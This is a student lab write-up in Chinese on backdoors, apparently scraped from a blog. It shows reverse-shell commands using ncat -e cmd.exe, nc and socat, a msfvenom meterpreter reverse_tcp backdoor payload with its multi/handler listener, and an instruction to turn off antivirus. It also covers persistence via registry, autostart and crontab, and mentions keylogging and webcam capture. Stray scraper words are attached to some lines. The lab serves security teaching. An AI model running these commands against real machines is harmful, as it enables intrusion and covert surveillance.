20155207王雪純 Exp2 後門原理與實踐

20155207王雪純 Exp2 後門原理與實踐

實驗步驟

1、windows獲取Linux shell

Windows:使用 ipconfig 命令查看當前機器IP地址。 linux

進入ncat所在文件地址,使用ncat命令打開監聽 shell

Linux反彈鏈接win: windows

2、Linux得到Windows Shell

在Linux終端輸入命令ifconfig查看虛擬機Linux的IP號。 而後輸入命令nc -l -p 5207讓虛擬機開始監聽指定端口5207網絡

在Windows命令行終端輸入命令ncat.exe -e cmd.exe Linux的IP 5207,讓Windows準備監聽端口5207 tcp

Linux得到Windows的相關信息,亂碼是不可識別的中文學習

3、使用netcat獲取主機操做Shell,cron啓動

windows下監聽端口:spa

輸入ncat.exe -l 端口號命令行

linux鏈接端口:3d

輸入nc windows_IP 端口號code

會話過程(可加入參數傳輸文件):

4、使用socat獲取主機操做Shell, 任務計劃啓動

下載並解壓socat

輸入指令socat - tcp:windows_IP:5207

使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

關閉全部殺毒軟件。

端輸入命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=5207 -f exe > 20155207_backdoor.exe

創建後門程序

在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口。

輸入如下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST Linux的IP
set LPORT 5223
show options

再輸入exploit開始監聽。

最後攝像頭就是鏈接不上,不知道爲撒

基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?

當咱們經過這樣的第三方平臺下載的軟件,就頗有可能經過咱們的主動點擊下載安裝到本身的主機上,使本身的電腦感染木馬病毒

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?

win:後門可能做爲一個exe文件藏在主機下,而後經過誘導用戶主動點擊、修改註冊表、添加到開機自啓動項、或者和咱們經常使用的軟件綁定在一塊兒同時啓動,具備很高的隱蔽性。

linux:linux中能夠經過crontab功能將木馬設爲定時啓動,也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的

(3)Meterpreter有哪些給你映像深入的功能?

錄音拍照截屏以及記錄鍵擊,可能泄露大量隱私

(4)如何發現本身有系統有沒有被安裝後門?

安裝可靠的殺毒軟件

實驗總結與體會

此次實踐中,我掌握了了後門的基本原理及它的運行過程,讓我從實踐的角度切實瞭解到計算機後門的存在和一些初級的後門設置方法。但本次實驗過程當中仍是很不順利,常常出現差錯,多是網絡設置的問題,也多是我對實驗理解不夠透徹,最後用的同窗的電腦完成了實驗,但願在下次實驗時可以進一步學習後門的有關知識

相關文章
相關標籤/搜索